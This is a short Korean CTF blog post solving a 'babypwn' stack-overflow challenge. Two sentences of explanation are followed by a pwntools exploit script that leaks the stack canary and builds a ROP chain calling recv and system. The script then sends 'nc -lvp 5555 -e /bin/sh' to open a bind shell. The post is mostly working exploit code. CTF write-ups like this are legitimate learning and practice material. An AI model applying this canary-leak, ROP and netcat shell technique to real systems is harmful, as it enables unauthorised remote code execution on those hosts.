메뉴창 보면 오버플로우 일어나는데 바로 볼 수 있다.
IDA로 옆에보면 system 함수가 대놓고 있어서 libc leak 없이 system plt 갖다쓰면 된다.
[exploit]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | from pwn import * p = remote('localhost', 8181) e = ELF('./babypwn') ppppr = 0x8048eec cmd = 'nc -lvp 5555 -e /bin/sh' + '\x00' print p.sendlineafter('> ', '1') p.sendlineafter(': ', 'A'*40) canary = p.recv(1024) canary = u32('\x00' + canary[len(canary)-3 : ]) print 'canary : ' + hex(canary) payload = '' payload += 'A'*40 payload += p32(canary) payload += 'A'*12 payload += p32(e.plt['recv']) payload += p32(ppppr) payload += p32(4) payload += p32(e.bss()) payload += p32(len(cmd)) payload += p32(0) payload += p32(e.plt['system']) payload += 'AAAA' payload += p32(e.bss()) p.sendlineafter('> ', '1') p.sendlineafter(': ', payload) p.sendlineafter('> ', '3') p.sendline(cmd) print 'nc localhost 5555' | cs |
'CTF' 카테고리의 다른 글
| [Codegate 2016] floppy (0) | 2018.03.03 |
|---|---|
| [ROOTCTF 2017] Factorization(sandbag) (0) | 2018.02.24 |
| [Codegate 2016] watermelon (0) | 2018.02.23 |
| [Codegate 2014] nuclear (0) | 2018.02.23 |
| [Codegate 2014] angry_doraemon (0) | 2018.02.22 |
